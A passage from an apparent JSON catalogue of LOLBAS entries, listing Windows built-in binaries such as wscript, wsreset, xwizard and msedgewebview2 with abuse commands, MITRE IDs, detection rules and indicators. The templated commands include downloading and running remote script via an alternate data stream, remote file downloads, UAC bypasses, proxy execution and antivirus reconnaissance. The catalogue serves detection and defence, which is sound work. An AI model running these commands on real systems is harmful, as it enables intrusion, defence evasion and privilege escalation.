block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:6","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WMIC.exe /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState","description":"Executes WMIC to gather the existing Antivirus or EDR solution installed on the machine.","usecase":"Recon","mitre":["T1518.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:workfolders-exe:0","toolId":"lolbas:workfolders-exe","toolName":"WorkFolders.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WorkFolders","description":"Execute `control.exe` in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"type":"IOC","value":"WorkFolders.exe should not be run on a normal workstation"},{"type":"IOC","value":"Registry modification to HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"}],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"]},{"id":"lolbas:workfolders-exe:1","toolId":"lolbas:workfolders-exe","toolName":"WorkFolders.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WorkFolders","description":"`WorkFolders` attempts to execute `control.exe`. By modifying the default value of the App Paths registry key for `control.exe` in `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe`, an attacker can achieve proxy execution.","usecase":"Proxy execution of a malicious payload via App Paths registry hijacking.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"type":"IOC","value":"WorkFolders.exe should not be run on a normal workstation"},{"type":"IOC","value":"Registry modification to HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"}],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"]},{"id":"lolbas:wscript-exe:0","toolId":"lolbas:wscript-exe","toolName":"Wscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"wscript //e:vbscript {PATH}:script.vbs","description":"Execute script stored in an alternate data stream","usecase":"Execute hidden code to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wscript.exe executing code from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into wscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"]},{"id":"lolbas:wscript-exe:1","toolId":"lolbas:wscript-exe","toolName":"Wscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"echo GetObject(\"script:{REMOTEURL:.js}\") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js","description":"Download and execute script stored in an alternate data stream","usecase":"Execute hidden code to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wscript.exe executing code from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into wscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"]},{"id":"lolbas:wsreset-exe:0","toolId":"lolbas:wsreset-exe","toolName":"Wsreset.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"wsreset.exe","description":"During startup, wsreset.exe checks the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsreset.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml"},{"type":"IOC","value":"wsreset.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"},{"type":"IOC","value":"Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen"}],"references":["https://www.activecyber.us/activelabs/windows-uac-bypass","https://twitter.com/ihack4falafel/status/1106644790114947073","https://github.com/hfiref0x/UACME/blob/master/README.md","https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"]},{"id":"lolbas:wuauclt-exe:0","toolId":"lolbas:wuauclt-exe","toolName":"wuauclt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer","description":"Loads and executes DLL code on attach.","usecase":"Execute dll via attach/detach methods","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml"},{"type":"IOC","value":"wuauclt run with a parameter of a DLL path"},{"type":"IOC","value":"Suspicious wuauclt Internet/network connections"}],"references":["https://dtm.uk/wuauclt/","https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"]},{"id":"lolbas:xwizard-exe:0","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}","description":"Xwizard.exe running a custom class that has been added to the registry.","usecase":"Run a com object created in registry to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"]},{"id":"lolbas:xwizard-exe:1","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}","description":"Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.","usecase":"Run a com object created in registry to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"]},{"id":"lolbas:xwizard-exe:2","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}","description":"Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"]},{"id":"lolbas:msedge-proxy-exe:0","toolId":"lolbas:msedge-proxy-exe","toolName":"msedge_proxy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}","description":"msedge_proxy will download malicious file.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"]},{"id":"lolbas:msedge-proxy-exe:1","toolId":"lolbas:msedge-proxy-exe","toolName":"msedge_proxy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"msedge_proxy.exe will execute file in the background","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"]},{"id":"lolbas:msedgewebview2-exe:0","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --no-sandbox --browser-subprocess-path=\"{PATH_ABSOLUTE:.exe}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:msedgewebview2-exe:1","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --utility-cmd-prefix=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:msedgewebview2-exe:2","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:msedgewebview2-exe:3","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --no-sandbox --renderer-cmd-prefix=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:odbcad32-exe:0","toolId":"lolbas:odbcad32-exe","toolName":"odbcad32.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"odbcad32.exe","description":"Launch odbcad32.exe GUI, click 'Tracing' tab, click 'Browsing' button, enter abitrary command in the File Dialog's path, press enter.","usecase":"Execute a binary as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"odbcad32.exe spawning unexpected child processes."}],"references":["https://medium.com/@thebinaryhashira/living-off-the-land-and-living-above-uac-6a66738d225c","https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"]},{"id":"lolbas:setupugc-exe:0","toolId":"lolbas:setupugc-exe","toolName":"setupugc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setupugc.exe specialize","description":"By first setting a command to a specific registry under `Setup-Unattend-Settings`, e.g. via: `reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\1\" /v Path /d \"{CMD}\" /f`, executing the following will cause it to execute the command.\n","usecase":"Execute binary through legitimate proxy","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`setupugc.exe` spawning child processes outside of Windows Setup context. Legitimate parents are `setuphost.exe` or `setup.exe`."},{"type":"IOC","value":"Registry writes to `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\` on a deployed system."}],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"]},{"id":"lolbas:setupugc-exe:1","toolId":"lolbas:setupugc-exe","toolName":"setupugc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setupugc.exe auditUser","description":"Same technique as above, but using the `auditUser` command-line option.","usecase":"Execute binary through legitimate proxy","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`setupugc.exe` spawning child processes outside of Windows Setup context. Legitimate parents are `setuphost.exe` or `setup.exe`."},{"type":"IOC","value":"Registry writes to `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\` on a deployed system."}],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"]},{"id":"lolbas:write-exe:0","toolId":"lolbas:write-exe","toolName":"write.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"write.exe","description":"Executes a binary provided in default value of `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\wordpad.exe`.","usecase":"Execute binary through legitimate proxy. This might be utilized to confuse detection solutions that rely on parent-child relationships.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Changes to 